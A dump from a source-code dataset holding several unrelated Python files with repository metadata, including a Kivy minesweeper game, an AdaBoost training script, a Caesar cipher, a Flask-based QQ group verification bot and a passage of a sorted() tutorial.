libs = ['-lpython' + pyver + abiflags]
libs += getvar('LIBS').split()
libs += getvar('SYSLIBS').split()
# add the prefix/lib/pythonX.Y/config dir, but only if there is no
# shared library in prefix/lib/.
if opt == '--ldflags':
if not getvar('Py_ENABLE_SHARED'):
libs.insert(0, '-L' + getvar('LIBPL'))
if not getvar('PYTHONFRAMEWORK'):
libs.extend(getvar('LINKFORSHARED').split())
print(' '.join(libs))
elif opt == '--extension-suffix':
ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
if ext_suffix is None:
ext_suffix = sysconfig.get_config_var('SO')
print(ext_suffix)
elif opt == '--abiflags':
if not getattr(sys, 'abiflags', None):
exit_with_usage()
print(sys.abiflags)
elif opt == '--configdir':
print(sysconfig.get_config_var('LIBPL'))
| [
"choikm3847@gmail.com"
] | choikm3847@gmail.com | |
61748d1f6e05bcad0eb600b0cbe6235327af080e | 3fbdf1a2672cc75607370ddc181cc67f145d1b65 | /actionScripts/toggleDemoMode.py | 957710b841713230f61c2e2b9e016e92b995994d | [] | no_license | aaronr22/HawKoin | f5706da59610437931346aed32b28cf80e315fd2 | d9174560dee9fbc211b3de1370fa515441e4ce32 | refs/heads/master | 2020-03-12T17:45:35.563987 | 2018-11-25T19:03:33 | 2018-11-25T19:03:33 | 130,744,026 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,494 | py | import json
import requests
import sys, getopt
def main(argv):
url = 'http://localhost:3000/api/org.hawkoin.network.DemoMode'
json_payload = {
'$class': 'org.hawkoin.network.DemoMode',
'id': 'activated'
}
try:
response = requests.post(url, json=json_payload)
status = response.status_code
if(status != 200):
json_string = response.text
parsed_json = json.loads(json_string)
statusCode = parsed_json['error']['statusCode']
if(statusCode == 500):
deleteResponse = requests.delete(url+'/activated')
if (deleteResponse.status_code == 204):
print('Successfully disabled demo mode')
#print(parsed_json['error']['message'])
elif (status == 200):
print('Successfully enabled demo mode')
except requests.exceptions.Timeout:
# Maybe set up for a retry, or continue in a retry loop
print("***Error***: Timeout")
except requests.exceptions.TooManyRedirects:
# Tell the user their URL was bad and try a different one
print("***Error***: URL is bad")
except requests.exceptions.RequestException as e:
# catastrophic error. bail.
print (e)
sys.exit(1)
except:
print("*** ERROR *** Unable to post Student")
if __name__ == '__main__':
main(sys.argv[1:])
| [
"mattaddessi@Matts-MacBook-Pro.local"
] | mattaddessi@Matts-MacBook-Pro.local |
b8b9956a5434afb4a9eb0572f601bb541e5995a5 | c13c732b767d4c71751b26aa89d6a17cb1c4bf51 | /adaboost.py | 4090e523f37ca05e1b247d7efb96556aceffd0ee | [] | no_license | gm19900510/Adaptive-Boosting-Classifier-for-Pedestrian-Attributes-Identification-with-Color-and-Texture-Feature | 092d9d61665e1cc5d2fc4227ff4fc1ce4a988836 | 6ad86870ed12fcc5ee4caf024914ca8990d18235 | refs/heads/master | 2020-04-18T16:43:22.410897 | 2018-09-06T09:39:28 | 2018-09-06T09:39:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,937 | py | import graphviz
import pydot
import time
import numpy as np
from sklearn.ensemble import AdaBoostClassifier
from sklearn.tree import DecisionTreeClassifier
from imblearn.under_sampling import RandomUnderSampler
from imblearn.combine import SMOTEENN
from sklearn.externals import joblib
from sklearn import tree
def training(X=None, y=None, estimator=1, output='adaboost_dir.pkl'):
rus = RandomUnderSampler(random_state=0)
#smote_enn = SMOTEENN(random_state=0)
#X_resampled, y_resampled = rus.fit_sample(X, y)
X_resampled, y_resampled = rus.fit_sample(X, y)
clf = AdaBoostClassifier(DecisionTreeClassifier(max_depth=1), n_estimators=estimator, algorithm='SAMME')
clf.fit(X_resampled, y_resampled)
#clf.fit(X, y)
clf.score(X_resampled, y_resampled)
joblib.dump(clf, output+".pkl")
return clf
def eval_score(classifier, X, y):
height = X.shape[0]
# T = 0, F = 1
result = np.zeros(5) # TN,FP,FN,TP, Acc
predicty = classifier.predict(X)
for i in range(0, height):
predicty_temp = predicty[i]
# y_temp = y[i, index]
y_temp = y[i]
if (y_temp == 0):
if (predicty_temp == 0):
result[0] = result[0] + 1
else:
result[1] = result[1] + 1
elif (y_temp == 1):
if (predicty_temp == 0):
result[2] = result[2] + 1
else:
result[3] = result[3] + 1
result[4] = classifier.score(X,y)
return result
def save(clf, filename):
joblib.dump(clf, filename)
def load(filename):
clf = joblib.load(filename)
return clf
def exportgraphviz(clf, output):
temp = 1
for estimator in clf.estimators_:
print(temp)
tree.export_graphviz(estimator, out_file=str(output) + str(temp) + '.dot')
temp = temp + 1
def estimatorweight(clf):
for weight in clf.estimator_weights_:
print(weight)
return clf.estimator_weights_
def estimatorerror(clf):
for error in clf.estimator_errors_:
print(error)
return clf.estimator_errors_
def gui_train(cf, mf, cv, wc, i_label):
X_array = []
if (cf != ""):
X_array = np.load(cf)
if (mf != ""):
mf = np.load(mf)
X_array = np.concatenate((X_array, mf), axis=1)
else:
X_array = mf
train_array = np.load("crossvalidation" + str(cv) + "/train_array.npy")
test_array = np.load("crossvalidation" + str(cv) + "/test_array.npy")
label_subset = np.load("labelsubset-cv5/AllLabelSubset.npy")
temp_result = np.zeros([cv, 4])
for k in range(0, cv):
X_train = X_array[train_array[k, :]]
X_test = X_array[test_array[k, :]]
y_train = label_subset[train_array[k, :], i_label]
y_test = label_subset[test_array[k, :], i_label]
# This point start calculating a computation time
start = time.time()
clf = training(X=X_train, y=y_train, estimator=wc)
end = time.time()
# end calculating
temp = eval_score(clf, X_test, y_test)
temp_result[k, :] = temp
result = np.mean(temp_result, axis=0)
result_string = "Time to training is " + str(end - start) + " milisecond /n"
result_string = result_string + "From " + str(y_test.shape[0]) + " Data Test the result is : /n"
result_string = result_string + "False True = " + str(result[0]) + "/n"
result_string = result_string + "False False = " + str(result[1]) + "/n"
result_string = result_string + "True False = " + str(result[2]) + "/n"
result_string = result_string + "True True = " + str(result[3]) + "/n"
"""" print("Time to training is "+str(end-start)+" milisecond")
print("From "+str(y_test.shape[0])+" Data Test the result is :")
print("False True = "+str(result[0]))
print("False False = "+str(result[1]))
print("True False = "+str(result[2]))
print("True True = "+str(result[3]))
"""
| [
"helmiagilachmani098@gmail.com"
] | helmiagilachmani098@gmail.com |
0cc996327080cef74cacd4ca115b5b1872936fa0 | 0e78b2df0fb93afc62684dece8ac05b700570248 | /BOJ/10833.py | 06f397ce5fd59451cdaa7e04768b716105b35bc1 | [] | no_license | ajy720/Algorithm | f1e2301327db09667ba011bc317c8f380707c25c | b141538802e9056f154ab91c816ad29500505f34 | refs/heads/master | 2022-05-06T21:37:05.780170 | 2022-04-23T09:25:52 | 2022-04-23T09:25:52 | 200,335,390 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 102 | py | ans = 0
for _ in ' '*int(input()):
a, b = map(int, input().split())
ans += b % a
print(ans)
| [
"ajy720@gmail.com"
] | ajy720@gmail.com |
f6f725cc17fc1faf7eac0a28e5e4359dcb58b5a7 | 3c94e55a1f2a41bdebd7a174c84c560283754b92 | /coffeecoin_admin/wsgi.py | 86e4bf45b6775b5ca4142c8a61f54a6eb322d346 | [] | no_license | coinmenace/coffeecoin_admin | 2542bca5f186b117a4d2b90cdde7cdbfa7ad6f3b | 65ceaa4ffba319fac3286388b572d19cde646bb0 | refs/heads/master | 2020-03-27T04:15:57.482384 | 2018-08-24T01:22:39 | 2018-08-24T01:22:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | """
WSGI config for coffeecoin_admin project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "coffeecoin_admin.settings")
application = get_wsgi_application()
| [
"webframes@gmail.com"
] | webframes@gmail.com |
7323b2c18d384da31b9dfd21065b9cdad6f87a6d | 38b720fe7a6d42a16703cdf262b4898c2cc43a7b | /main.py | 105de1e70caf6d9fdddf22959cdf2c46a188ac16 | [
"CC-BY-4.0",
"MIT"
] | permissive | learnleapfly/minesweeper | aa2492b9f560593d49e887753e7f2475df390b19 | a9a951137da68a37ac4db2129ce4679f741d8fea | refs/heads/master | 2021-01-20T22:34:21.408485 | 2016-06-03T05:39:43 | 2016-06-03T05:39:43 | 60,320,836 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,265 | py | from kivy.app import App
from kivy.uix.label import Label
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.gridlayout import GridLayout
from kivy.properties import NumericProperty, ObjectProperty, StringProperty
from kivy.clock import Clock
from kivy.core.window import Window
from kivy.logger import Logger
from random import choice
from itertools import product
from kivy.animation import Animation
###########################################################################
TOUCH_HOLD_THRESHOLD = 0.5
GAME_SIZE = 4
NUMBER_OF_BOMBS = 2
class GridSquare(Label):
square_label = StringProperty('Z')
def __init__(self, **kwargs):
super(GridSquare, self).__init__(**kwargs)
self.is_bomb = False
self.guess_bomb = False
self.is_hidden = True
self.square_label = '.'
self.bombs_nearby = 0
self.coords = None
def set_label(self):
if self.guess_bomb:
self.square_label = 'Bomb?'
elif self.is_hidden:
self.square_label = '.'
elif self.is_bomb:
self.square_label = 'BOOM'
self.parent.parent.mainwindow.end_game('You Lose!')
elif self.bombs_nearby > 0:
self.square_label = str(self.bombs_nearby)
else:
self.square_label = ' '
def reveal_square(self):
if self.is_hidden:
self.is_hidden = False
self.set_label()
if self.is_bomb is False and self.bombs_nearby == 0:
for neighbour in self.parent.get_neighbours(self.coords):
neighbour.reveal_square()
if self.parent.parent is not None:
self.parent.parent.mainwindow.check_for_win()
def on_touch_up(self, touch):
if self.collide_point(*touch.pos):
if Clock.get_time() - touch.time_start > TOUCH_HOLD_THRESHOLD:
self.toggle_guess_bomb()
else:
self.reveal_square()
return True
def toggle_guess_bomb(self):
self.guess_bomb = not self.guess_bomb
self.set_label()
if self.guess_bomb:
self.parent.parent.mainwindow.num_bombs_left -= 1
else:
self.parent.parent.mainwindow.num_bombs_left += 1
class GameBoard(GridLayout):
mainwindow = ObjectProperty(None)
def __init__(self, **kwargs):
super(GameBoard, self).__init__(**kwargs)
self.board_size = GAME_SIZE
self.cols = GAME_SIZE
self.grid_squares = {}
for coords in product(xrange(0, self.board_size), xrange(0, self.board_size)):
new_square = GridSquare()
new_square.coords = coords
self.grid_squares[coords] = new_square
self.add_widget(new_square)
self.scatter_bombs(NUMBER_OF_BOMBS)
self.compute_all_bomb_counts()
def get_neighbours(self, (row, col)):
for coord in product(range(row-1, row+2), range(col-1, col+2)):
if coord in self.grid_squares.keys() and coord != (row, col):
yield self.grid_squares[coord]
def scatter_bombs(self, num_bombs):
for _ in xrange(0, num_bombs):
coords = choice([(x, y) for x in range(0, self.board_size) for y in range(0, self.board_size)])
self.grid_squares[coords].is_bomb = True
def compute_all_bomb_counts(self):
for coord in product(xrange(0, self.board_size), xrange(0, self.board_size)):
grid_square = self.grid_squares[coord]
grid_square.bombs_nearby = self.compute_bomb_count(coord)
def compute_bomb_count(self, target):
bomb_count = 0
for neighbour in self.get_neighbours(target):
if neighbour.is_bomb:
bomb_count += 1
return bomb_count
class MinesweeperGame(BoxLayout):
num_bombs_left = NumericProperty(None)
timer = NumericProperty(None)
best_time = NumericProperty(None)
winner_status = StringProperty('Unknown')
def __init__(self, **kwargs):
super(MinesweeperGame, self).__init__(**kwargs)
self._keyboard = Window.request_keyboard(self.close, self)
self._keyboard.bind(on_key_down=self.press)
self.num_bombs_left = NUMBER_OF_BOMBS
self.timer = 999
self.start_time = Clock.get_time()
self.best_time = 9999
self.board = GameBoard()
self.playing_area.add_widget(self.board)
Clock.schedule_interval(self.timer_callback, 1.0)
def timer_callback(self, _):
self.timer = int(Clock.get_time() - self.start_time)
def close(self):
self._keyboard.unbind(on_key_down=self.press)
self._keyboard = None
App.get_running_app().stop()
def reset_game(self, instance=None, value=None):
Logger.info("reset: game")
if self.board:
self.playing_area.remove_widget(self.board)
self.board = GameBoard()
self.playing_area.add_widget(self.board)
self.start_time = Clock.get_time()
def press(self, keyboard, keycode, text, modifiers):
if keycode[1] == 'escape':
self.close()
elif keycode[1] == 'r':
self.reset_game()
else:
Logger.info("Unknown key: {}".format(keycode))
return True
def check_for_win(self):
for gs in self.board.grid_squares.values():
if gs.is_hidden and gs.is_bomb is False:
return False
self.end_game('You Win!')
def end_game(self, status):
self.winner_status = status
if 'win' in status.lower() and self.timer < self.best_time:
self.best_time = self.timer
label = Label(text=status)
animation = Animation(font_size=72, d=2)
animation += Animation(font_size=0, d=1)
self.playing_area.add_widget(label)
animation.bind(on_complete=self.reset_game)
animation.start(label)
###########################################################################
###########################################################################
class MinesweeperApp(App):
def build(self):
game = MinesweeperGame()
game.reset_game()
return game
if __name__ == '__main__':
MinesweeperApp().run()
| [
"sastels@gmail.com"
] | sastels@gmail.com |
32cb38a310c700108f11efe46c3216dddabc43fd | 0649e55322c5efa514294754151cedda66ea28be | /build-template/cotton_settings.py | 0598181e80025bf2d14645be1e71bedbd9ebb1e2 | [
"MIT"
] | permissive | evilchili/cotton | c803eabe9fb27dd45b3a545c4f0407c7f6303427 | 92d72a372e2afed91b6c5928ba096ed1d74f5c9a | refs/heads/master | 2021-01-13T02:08:54.495162 | 2015-02-13T16:06:10 | 2015-02-13T16:06:10 | 30,030,865 | 1 | 2 | null | 2015-02-03T23:29:16 | 2015-01-29T16:59:01 | Python | UTF-8 | Python | false | false | 2,844 | py | # cotton_settings.py
# -- Tell cotton how to deploy your application
#
# Import the default settings directly into the current namespace, so that you can combine,
# extend, and override the defaults with settings unique to your application deployment.
from cotton.settings import *
import os
# Name your project here. Will be used as a directory name, so be sensible.
PROJECT_NAME = ''
# deploy the appplication to /usr/local/deploy/sprobot/, creating
# bin/, lib/, project/ and so on at that location.
VIRTUALENV_PATH = os.path.join(VIRTUALENV_HOME, PROJECT_NAME)
# Where the application code (ie, the contents of the current directory) will be deployed.
PROJECT_ROOT = os.path.join(VIRTUALENV_PATH, 'project')
# A list of target nodes which cotton should (optionally) bootstrap and deploy your app to
HOSTS = []
# A list of IPv4 addresses that should be granted administrative access. This includes
# permitting SSH access, and may be leveraged for additional purposes in your ap
ADMIN_IPS = []
# The system user and group that should execute your application. The user will be created
# by cotton automatically, if it doesn't already exist. Existing users should not have extra
# privileges, including sudo access.
PROJECT_USER = ''
PROJECT_GROUP = ''
# PIP_REQUIREMENTS_PATH is defined by cotton's default settings, and includes cotton's very small
# list of required python packages (ie, virtualenv). You can override this or extend it with the
# path to your own requirements.txt, relative to your application's root.
#
#PIP_REQUIREMENTS_PATH += ['build/requirements/pip.txt']
# If True, do not prompt for confirmation of dangerous actions. Required for unattended operation,
# but dangerous in mixed (ie, dev/testing) environments, so disabled by default.
#
# NO_PROMPTS = False
# The timezone the HOSTS should be in. Cotton defaults to UTC; you can override that here.
#TIMEZONE = "America/New_York"
# By default cotton assumes your application is in a git repository, and that git can be used
# to deploy the application source to the HOSTS.
#
#USE_GIT = True
# If you want your HOSTS to run an SMTP server for outbound mail, set SMTP_HOST=True. You can
# specify a relay host with SMTP_RELAY.
#SMTP_HOST = False
#SMTP_RELAY = None
# Cotton includes a minimal set of templates for configuration files that can be managed by cotton.
# You can extend the templates by adding template files, using standard python string.format()
# syntax, to your /build/templates folder, and define their use below.
#
# Here is an example for a hypothetical crontab used to execute scheduled tasks for your app:
#
# TEMPLATES += [
# {
# "name": "cron",
# "local_path": "templates/crontab",
# "remote_path": "/etc/cron.d/%(project_name)s",
# "owner": "root",
# "mode": "600",
# }
# ]
#TEMPLATES += []
| [
"greg@automagick.us"
] | greg@automagick.us |
20691830fbf91a5caae39677d6ec0024590b522a | 72b00923d4aa11891f4a3038324c8952572cc4b2 | /python/datastruct/dd_oob/pgm07_28.txt | c1f7f8084c1a8e16b2bdb107bdc35ca04776988a | [] | no_license | taowuwen/codec | 3698110a09a770407e8fb631e21d86ba5a885cd5 | d92933b07f21dae950160a91bb361fa187e26cd2 | refs/heads/master | 2022-03-17T07:43:55.574505 | 2022-03-10T05:20:44 | 2022-03-10T05:20:44 | 87,379,261 | 0 | 0 | null | 2019-03-25T15:40:27 | 2017-04-06T02:50:54 | C | UTF-8 | Python | false | false | 722 | txt | #
# This file contains the Python code from Program 7.28 of
# "Data Structures and Algorithms
# with Object-Oriented Design Patterns in Python"
# by Bruno R. Preiss.
#
# Copyright (c) 2003 by Bruno R. Preiss, P.Eng. All rights reserved.
#
# http://www.brpreiss.com/books/opus7/programs/pgm07_28.txt
#
class SortedListAsArray(OrderedListAsArray, SortedList):
    """Sorted list backed by a fixed-capacity array (Preiss, Program 7.28)."""
    def withdraw(self, obj):
        """Remove *obj* from the list, shifting later elements one slot left.

        Raises ContainerEmpty when the list is empty and KeyError when
        *obj* is not present (findOffset returned a negative index).
        """
        if self._count == 0:
            raise ContainerEmpty
        offset = self.findOffset(obj)
        if offset < 0:
            raise KeyError
        i = offset
        # Shift everything after the removed slot one position left.
        # NOTE(review): the final iteration reads self._array[self._count],
        # so this assumes the backing array's capacity exceeds _count —
        # true for the book's Array class, but worth confirming here.
        while i < self._count:
            self._array[i] = self._array[i + 1]
            i += 1
        self._array[i] = None
        self._count -= 1
    # ...
| [
"taowuwen@126.com"
] | taowuwen@126.com |
8dcec558df4f4a3598ab780b750a6e0064bd8ade | cf5bc71196814c875fe7f63d441d6ca016155737 | /caesar-cipher.py | 33a227678064870e30fae361b1860d0ad6c915f2 | [] | no_license | pkrrs/caeser_cipher | 2aa15426531ce7dd5c23a61620d2a6b37b9b19da | 20ad1835fab7325156be0b430969c063db061dd7 | refs/heads/main | 2023-06-22T21:37:25.377007 | 2021-07-06T19:07:07 | 2021-07-06T19:07:07 | 383,572,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,057 | py | alphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c',
'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's',
't', 'u', 'v', 'w', 'x', 'y', 'z']
logo = """
,adPPYba, ,adPPYYba, ,adPPYba, ,adPPYba, ,adPPYYba, 8b,dPPYba,
a8" "" "" `Y8 a8P_____88 I8[ "" "" `Y8 88P' "Y8
8b ,adPPPPP88 8PP""""""" `"Y8ba, ,adPPPPP88 88
"8a, ,aa 88, ,88 "8b, ,aa aa ]8I 88, ,88 88
`"Ybbd8"' `"8bbdP"Y8 `"Ybbd8"' `"YbbdP"' `"8bbdP"Y8 88
88 88
"" 88
88
,adPPYba, 88 8b,dPPYba, 88,dPPYba, ,adPPYba, 8b,dPPYba,
a8" "" 88 88P' "8a 88P' "8a a8P_____88 88P' "Y8
8b 88 88 d8 88 88 8PP""""""" 88
"8a, ,aa 88 88b, ,a8" 88 88 "8b, ,aa 88
`"Ybbd8"' 88 88`YbbdP"' 88 88 `"Ybbd8"' 88
88
88
"""
print(logo)
def caesar(direction, text, shift):
    """Encrypt or decrypt *text* with a Caesar cipher and print the result.

    direction: "encode" shifts letters forward, "decode" shifts backward.
    text:      message to transform; non-letters are copied through unchanged.
    shift:     number of alphabet positions to rotate; any integer works
               because the offset is reduced modulo 26.

    Prints "The <direction>d text is <result>" (same output contract as
    before) instead of returning the transformed string.
    """
    if direction == "decode":
        shift *= -1  # decoding is just encoding with the opposite shift
    word = []
    for letter in text:
        if letter.isalpha():
            # Rotate within the letter's own case; the old lookup table was
            # lowercase-only and raised ValueError on uppercase input.
            base = ord('a') if letter.islower() else ord('A')
            word.append(chr(base + (ord(letter) - base + shift) % 26))
        else:
            word.append(letter)
    print(f"The {direction}d text is {''.join(word)}")
should_continue = True
# Simple REPL: keep encoding/decoding until the user answers "no".
while should_continue:
    direction = input("Type 'encode' to encrypt, type 'decode' to decrypt:\n")
    text = input("Type your message:\n").lower()
    shift = int(input("Type the shift number:\n"))
    # Reduce the shift into [0, 26) so any integer input is accepted.
    shift = shift % 26
    caesar(direction, text, shift)
    control= input("Do you wish to Continue. Type 'yes' or 'no'. ")
    if control == "no":
        should_continue = False
        print("GoodBye!")
| [
"noreply@github.com"
] | pkrrs.noreply@github.com |
69431a884b8cbce9273d4e7c5a8c5fa2e91d8e23 | 88bae1c9e754704daaab7d2dc2d331588bf0198f | /stringSpacePL.py | ded3921f8716ae01148f47cf99fe71fb24f895b1 | [] | no_license | AdamBialachowski/DODziennyBonus | b494227b5d72ff2c02d9c761e605d5b6ba7e9008 | 50a54d706db043780a6b25a7d76d6b10cbd52dd5 | refs/heads/master | 2022-11-06T10:36:36.843255 | 2020-06-16T14:19:21 | 2020-06-16T14:19:21 | 271,051,279 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | dailyBonus = "Dzienny bonus"
# Polish UI label strings (runtime text — do not translate).
howManyAccount = "Podaj ile kont chcesz zalogować"  # "Enter how many accounts to log in"
next = "Dalej"  # "Next" — NOTE(review): shadows the built-in next()
add = "Dodaj"  # "Add"
login = "Login:"
password = "Hasło:" | [
"pitoab@wp.pl"
] | pitoab@wp.pl |
16e518af1ef8faffdd952926725af111f5dc1064 | 35dbe24cd5bd9abc5e5f2963affbb53ab47af9c7 | /self_parameter.py | cb0164a403517af8e796944d0bdc53bc65c3cad5 | [] | no_license | geethayedida/codeacademy_python | 4f4baf67c179fa423c86242ceb37a0494e458ec3 | 1705af3ffa4b0e767d5b4db98a515aeb5b814da8 | refs/heads/master | 2021-01-10T11:14:36.134173 | 2016-02-05T16:35:16 | 2016-02-05T16:35:16 | 51,018,834 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 169 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Feb 03 19:38:52 2016
@author: Geetha Yedida
"""
class Animal(object):
def __init__(self, name):
self.name = name | [
"yedida.geetha@gmail.com"
] | yedida.geetha@gmail.com |
c4811b51bbacc8bb1c631898f0908eeb72d312dc | 6cdbc1f314d12ed5bff21cd6ca5b2e7b71f09c91 | /lists/migrations/0004_item_list.py | 731a08eb05a32c707ff665942814a314ab9e053b | [] | no_license | nanjsun/TDD-Django | 11940a715f5f312ff2c297e146cbaa65f95ba151 | 1c80127339efd3587977e9193adee01fc04f03fa | refs/heads/master | 2021-01-19T10:00:33.128559 | 2017-04-07T00:16:43 | 2017-04-07T00:16:43 | 87,811,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 524 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-12-01 21:13
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django (see header); adds the Item.list foreign key.
    # Edit only to resolve migration conflicts, not to change behaviour.
    dependencies = [
        ('lists', '0003_list'),  # must run after the List model exists
    ]
    operations = [
        migrations.AddField(
            model_name='item',
            name='list',
            # NOTE(review): default=None on this FK — confirm existing Item
            # rows (if any) were handled when this migration first ran.
            field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='lists.List'),
        ),
    ]
| [
"279956327@qq.com"
] | 279956327@qq.com |
2ceb33c6d79c386bdc5e5ec6a9245488beada078 | 9ef59114b6be16df404a1041ecc7f5f885f4ee1d | /qqbot.py | 86b91d8c1721f9656e3e82873bd54a63703b791a | [
"Apache-2.0"
] | permissive | limu520/qqbot_checkbot | 7ff0dace0ac6f90a6f44aed53bdd7490638738d1 | 205e077dcd0e6096f26056e7936da11ae93786d4 | refs/heads/main | 2023-07-09T12:58:09.251477 | 2021-08-06T05:59:37 | 2021-08-06T05:59:37 | 393,256,601 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,777 | py | from flask import *
import requests
import sqlite3
import random
import json
##配置文件
api_url1 = 'http://127.0.0.1:5700/send_msg'
api_url2 = "http://127.0.0.1:5700/delete_msg"
qq_group=["723174283"]
## startup: ensure each configured group has its own verification table
for a in qq_group:
	db = sqlite3.connect("qq.db")
	cur=db.cursor()
	# One table per group, named qq<group_id>; `a` comes from the trusted
	# qq_group config above, so concatenating it into the name is safe here.
	cur.execute("CREATE TABLE IF NOT EXISTS qq"+a+"(qq_id TEXT,confirm TEXT)")
	db.commit()
	cur.close()
	db.close()
##数据库增加
def inc(db_name = "", qq_id = "",con_id = ""):
	"""Insert a pending-verification record into table qq<db_name>.

	db_name: group-id suffix of the per-group table created at startup.
	qq_id:   member QQ id (stored as text).
	con_id:  challenge string the member must repeat in the group.
	Returns '' like the other DB helpers.
	"""
	db = sqlite3.connect("qq.db")
	try:
		# Values go through ? placeholders; only the table name is
		# concatenated (it comes from the trusted qq_group config).
		db.execute("INSERT INTO qq"+db_name+" values(?,?)",(str(qq_id),str(con_id)))
		db.commit()
	finally:
		db.close()  # previously leaked the connection if the INSERT raised
	return ''
##数据库删除
def delqq(db_name = "", qq_id = ""):
	"""Delete a member's verification record from table qq<db_name>.

	qq_id is now bound as a ? parameter instead of being concatenated into
	the SQL text, closing an injection hole; rows are stored as str(qq_id)
	by inc(), so the text comparison still matches.
	Returns '' like the other DB helpers.
	"""
	db = sqlite3.connect("qq.db")
	try:
		db.execute("DELETE FROM qq"+db_name+" WHERE qq_id=?", (str(qq_id),))
		db.commit()
	finally:
		db.close()  # previously leaked the connection if the DELETE raised
	return ''
##数据库查询
def check(db_name = "", qq_id = ""):
	"""Return the (qq_id, confirm) row for a member, or None if absent.

	qq_id is bound as a ? parameter (the original concatenated it into the
	SQL string); inc() stores ids as text, so the comparison still matches.
	"""
	db = sqlite3.connect("qq.db")
	try:
		result = db.execute("SELECT * FROM qq"+db_name+" where qq_id=?", (str(qq_id),)).fetchone()
	finally:
		db.close()  # previously leaked the connection if the SELECT raised
	return result
##撤回
def del_msg(msg_id = 0):
	"""Ask the local CQ-HTTP API to recall (delete) a message by id."""
	msg = {
		"message_id":msg_id
	}
	# POST form data to the /delete_msg endpoint (api_url2).
	msg_re = requests.post(api_url2,data=msg)
	print(msg_re)  # logs only the Response object (status), not its body
	return ''
##群消息发送
def group_msg(group_id = 0 , message = ""):
	"""Send *message* to QQ group *group_id* via the CQ-HTTP /send_msg API.

	auto_escape=False leaves CQ codes inside *message* interpreted.
	"""
	msg = {
		'group_id':group_id,
		'message':message,
		'auto_escape':False
	}
	msg_re = requests.post(api_url1,data=msg)
	print(msg_re)  # logs the Response object for debugging
	return ''
##主程序
bot_server = Flask(__name__)
@bot_server.route('/',methods=['POST'])
def server():
	"""Webhook endpoint receiving CQ-HTTP event reports.

	New group members get a random challenge string; until a member
	repeats it in the group, every message they send is recalled.
	"""
	data = request.get_data().decode('utf-8')
	data = json.loads(data)
	print(data)  # log the raw event for debugging
	## member-join notice: issue a verification challenge
	if data["post_type"] == "notice" and data["notice_type"] == "group_increase":
		# random.sample returns a LIST of 8 letters; str() of that list
		# (e.g. "['a', 'b', ...]") is what is stored and must be echoed.
		con_id = random.sample('zyxwvutsrqponmlkjihgfedcba',8)
		inc(str(data["group_id"]),str(data["user_id"]),str(con_id))
		group_msg(data["group_id"],"请在群内发送以下字符串\n"+str(con_id)+"\n然后您将可以在本群发言")
	if data["post_type"] == "message":
		if str(data["group_id"]) in qq_group:
			# A pending row means this member has not verified yet.
			result = check(str(data["group_id"]),str(data["user_id"]))
			if result:
				if result[1] in data["message"]:
					# Challenge echoed: congratulate and clear the record.
					group_msg(data["group_id"],"恭喜您通过验证!!!")
					delqq(str(data["group_id"]), str(data["user_id"]))
				else:
					# Not verified: recall the message and remind them.
					del_msg(data["message_id"])
					group_msg(data["group_id"],"请完成验证")
	return ''
if __name__ == '__main__':
bot_server.run(host="127.0.0.1",port=5701,debug=True)
| [
"noreply@github.com"
] | limu520.noreply@github.com |
89526b724a8f8978c3bf6a388199944ae3c8c518 | 94a418db07710410479a1b54d7ddca163ec5b5a1 | /7-25/高阶函数之sorted函数.py | f15b2c90d28c4505070c577818da8feb40dd5407 | [] | no_license | 1131057908/yuke | 2e09736575ae3ed9cc86141f3a24e3055577d7ea | 7985ead3b8ab0eb9d503bcb85112364a36bff800 | refs/heads/master | 2020-03-24T17:54:06.320658 | 2018-07-30T13:01:02 | 2018-07-30T13:01:02 | 142,875,808 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,096 | py | """
座右铭:将来的你一定会感激现在拼命的自己
@project:7-25
@author:Mr.Zhang
@file:高阶函数之sorted函数.PY
@ide:PyCharm
@time:2018-07-25 10:51:28
"""
#sorted():用于对个序列进行升序排列。第一个参数:序列,第二个参数key:用于指定一个只接收一个参数的函数,这个函数用于从序列中的每个元素中提取一个用于排序的关键字,默认值为None。第三个参数reverse:有两个值,一个为True,一个为False。如果reverse=True,则列表中的元素会被倒序排列。
#sorted默认按照ASCII排序
from functools import cmp_to_key
#
# list1=[30,50,70,3,9]
# list2=sorted(list1)
# print('排列之后的结果',list2)
#5,3,2,4,1
#1,2,3,4,5
#5,4,3,2,1
#a:97,b:98,c:99,d,100
# list4=['b','c','a','d']
# list3=sorted(list4,reverse=True)
# print(list4)
# print('倒序排列:',list3)
# #
# list5=[('b',4),('a',0),('c',2),('d',3)]
# list6=sorted(list5,key=lambda x:x[0])
# print('=====',list6)
# #如果使用sorted()函数实现对一个序列的降序排序。
list7=[20,15,70,3,9]
# list8=sorted(list7)
# print('升序排列:',list8)
# #
# #如果x>y返回-1,x<y返回1,是按照降序排列的
# #如果x>y返回1,x<y返回-1,则就是默认的升序排列
def revsersed(x,y):
	"""Comparator for descending order: -1 if x>y, 1 if x<y, 0 if equal.

	Feed through functools.cmp_to_key to sort a sequence high-to-low.
	"""
	# (x < y) - (x > y) is the classic cmp() idiom, inverted for descending.
